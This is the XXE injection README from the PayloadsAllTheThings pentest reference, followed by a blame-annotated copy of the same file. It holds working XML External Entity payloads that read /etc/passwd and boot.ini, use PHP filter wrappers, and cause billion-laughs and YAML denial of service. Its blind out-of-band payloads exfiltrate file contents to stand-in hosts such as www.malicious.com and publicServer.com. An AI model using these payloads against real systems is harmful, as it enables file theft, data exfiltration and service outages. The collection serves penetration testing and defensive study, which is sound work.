PayloadsAllTheThings/XXE injection/README.md

# XML External Entity

An XML External Entity attack is a type of attack against an application that parses XML input

## Exploit

Basic Test

```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
 <userInfo>
  <firstName>John</firstName>
  <lastName>&example;</lastName>
 </userInfo>
```

## Basic XXE

Classic XXE

```xml
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
```

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
```

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
```

Classic XXE Base64 encoded

```xml
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
```

## PHP Wrapper inside XXE

```xml
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
  <contact>
    <name>Jean &xxe; Dupont</name>
    <phone>00 11 22 33 44</phone>
    <adress>42 rue du CTF</adress>
    <zipcode>75000</zipcode>
    <city>Paris</city>
  </contact>
</contacts>
```

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >
]>
<foo>&xxe;</foo>
```

## Deny of service

Deny Of Service - Billion Laugh Attack

```xml
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
```

Yaml attack

```xml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```

## Blind XXE

Blind XXE

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>
```

XXE OOB Attack (Yunusov, 2013)

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>

File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;
```

XXE OOB with DTD and PHP filter

```xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

File stored on http://127.0.0.1/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
```

XXE Inside SOAP

```xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
```

## Thanks to

* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
XXE payloads 2016-10-18 07:06:10 +00:00			`# XML External Entity`
Markdown formatting update 2018-08-12 21:30:22 +00:00
XXE via DTD and PHP Filter 2017-06-28 19:43:30 +00:00			`An XML External Entity attack is a type of attack against an application that parses XML input`
Init directory with README 2016-10-18 08:01:56 +00:00
XXE payloads 2016-10-18 07:06:10 +00:00			`## Exploit`
Init directory with README 2016-10-18 08:01:56 +00:00
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			`Basic Test`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```xml
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			`<!--?xml version="1.0" ?-->`
			`<!DOCTYPE replace [<!ENTITY example "Doe"> ]>`
			`<userInfo>`
			`<firstName>John</firstName>`
			`<lastName>&example;</lastName>`
			`</userInfo>`
			```

Mimikatz + Credential Windows + XXE update 2017-12-06 19:40:29 +00:00			`## Basic XXE`
Markdown formatting update 2018-08-12 21:30:22 +00:00
XXE payloads 2016-10-18 07:06:10 +00:00			`Classic XXE`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```xml
XXE payloads 2016-10-18 07:06:10 +00:00			`<?xml version="1.0"?>`
			`<!DOCTYPE data [`
			`<!ELEMENT data (#ANY)>`
XXE renamed, little updates in SQL/Include + enum 2016-11-03 16:56:15 +00:00			`<!ENTITY file SYSTEM "file:///etc/passwd">`
XXE payloads 2016-10-18 07:06:10 +00:00			`]>`
			`<data>&file;</data>`
Init directory with README 2016-10-18 08:01:56 +00:00			```

Markdown formatting update 2018-08-12 21:30:22 +00:00			```xml
Mimikatz + Credential Windows + XXE update 2017-12-06 19:40:29 +00:00			`<?xml version="1.0" encoding="ISO-8859-1"?>`
			`<!DOCTYPE foo [`
			`<!ELEMENT foo ANY >`
			`<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
			```

Markdown formatting update 2018-08-12 21:30:22 +00:00			```xml
Mimikatz + Credential Windows + XXE update 2017-12-06 19:40:29 +00:00			`<?xml version="1.0" encoding="ISO-8859-1"?>`
			`<!DOCTYPE foo [`
			`<!ELEMENT foo ANY >`
			`<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>`
			```

XXE payloads 2016-10-18 07:06:10 +00:00			`Classic XXE Base64 encoded`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```xml
Mimikatz + Credential Windows + XXE update 2017-12-06 19:40:29 +00:00			`<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>`
XXE payloads 2016-10-18 07:06:10 +00:00			```

Mimikatz + Credential Windows + XXE update 2017-12-06 19:40:29 +00:00			`## PHP Wrapper inside XXE`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```xml
XXE renamed, little updates in SQL/Include + enum 2016-11-03 16:56:15 +00:00			`<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>`
			`<contacts>`
			`<contact>`
			`<name>Jean &xxe; Dupont</name>`
			`<phone>00 11 22 33 44</phone>`
			`<adress>42 rue du CTF</adress>`
			`<zipcode>75000</zipcode>`
			`<city>Paris</city>`
			`</contact>`
XXE via DTD and PHP Filter 2017-06-28 19:43:30 +00:00			`</contacts>`
XXE renamed, little updates in SQL/Include + enum 2016-11-03 16:56:15 +00:00			```

Markdown formatting update 2018-08-12 21:30:22 +00:00			```xml
Mimikatz + Credential Windows + XXE update 2017-12-06 19:40:29 +00:00			`<?xml version="1.0" encoding="ISO-8859-1"?>`
			`<!DOCTYPE foo [`
			`<!ELEMENT foo ANY >`
			`<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >`
			`]>`
			`<foo>&xxe;</foo>`
			```
XXE renamed, little updates in SQL/Include + enum 2016-11-03 16:56:15 +00:00
Mimikatz + Credential Windows + XXE update 2017-12-06 19:40:29 +00:00			`## Deny of service`
Markdown formatting update 2018-08-12 21:30:22 +00:00
XXE payloads 2016-10-18 07:06:10 +00:00			`Deny Of Service - Billion Laugh Attack`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```xml
XXE payloads 2016-10-18 07:06:10 +00:00			`<!DOCTYPE data [`
			`<!ENTITY a0 "dos" >`
			`<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">`
			`<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">`
			`<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">`
			`<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">`
			`]>`
			`<data>&a4;</data>`
			```

Mimikatz + Credential Windows + XXE update 2017-12-06 19:40:29 +00:00			`Yaml attack`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```xml
Mimikatz + Credential Windows + XXE update 2017-12-06 19:40:29 +00:00			`a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]`
			`b: &b [a,a,a,a,a,a,a,a,*a]`
			`c: &c [b,b,b,b,b,b,b,b,*b]`
			`d: &d [c,c,c,c,c,c,c,c,*c]`
			`e: &e [d,d,d,d,d,d,d,d,*d]`
			`f: &f [e,e,e,e,e,e,e,e,*e]`
			`g: &g [f,f,f,f,f,f,f,f,*f]`
			`h: &h [g,g,g,g,g,g,g,g,*g]`
			`i: &i [h,h,h,h,h,h,h,h,*h]`
			```

			`## Blind XXE`
Markdown formatting update 2018-08-12 21:30:22 +00:00
XXE renamed, little updates in SQL/Include + enum 2016-11-03 16:56:15 +00:00			`Blind XXE`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```xml
XXE renamed, little updates in SQL/Include + enum 2016-11-03 16:56:15 +00:00			`<?xml version="1.0" encoding="ISO-8859-1"?>`
			`<!DOCTYPE foo [`
			`<!ELEMENT foo ANY >`
			`<!ENTITY % xxe SYSTEM "file:///etc/passwd" >`
			`<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">`
			`]`
			`>`
			`<foo>&callhome;</foo>`
			```

XXE payloads 2016-10-18 07:06:10 +00:00			`XXE OOB Attack (Yunusov, 2013)`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```xml
XXE payloads 2016-10-18 07:06:10 +00:00			`<?xml version="1.0" encoding="utf-8"?>`
			`<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">`
			`<data>&send;</data>`

			`File stored on http://publicServer.com/parameterEntity_oob.dtd`
			`<!ENTITY % file SYSTEM "file:///sys/power/image_size">`
			`<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">`
			`%all;`
			```

XXE via DTD and PHP Filter 2017-06-28 19:43:30 +00:00			`XXE OOB with DTD and PHP filter`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```xml
XXE via DTD and PHP Filter 2017-06-28 19:43:30 +00:00			`<?xml version="1.0" ?>`
			`<!DOCTYPE r [`
			`<!ELEMENT r ANY >`
Payloads - Quick fix 2018-02-23 12:48:51 +00:00			`<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">`
XXE via DTD and PHP Filter 2017-06-28 19:43:30 +00:00			`%sp;`
			`%param1;`
			`]>`
			`<r>&exfil;</r>`

Payloads - Quick fix 2018-02-23 12:48:51 +00:00			`File stored on http://127.0.0.1/dtd.xml`
XXE via DTD and PHP Filter 2017-06-28 19:43:30 +00:00			`<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">`
Payloads - Quick fix 2018-02-23 12:48:51 +00:00			`<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">`
XXE via DTD and PHP Filter 2017-06-28 19:43:30 +00:00			```
XXE payloads 2016-10-18 07:06:10 +00:00
SSRF URL Scheme + XXE Soap 2017-08-07 19:42:14 +00:00			`XXE Inside SOAP`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```xml
SSRF URL Scheme + XXE Soap 2017-08-07 19:42:14 +00:00			`<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>`
			```

Init directory with README 2016-10-18 08:01:56 +00:00			`## Thanks to`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			`* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)`
			`* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)`
			`* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)`
			`* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)`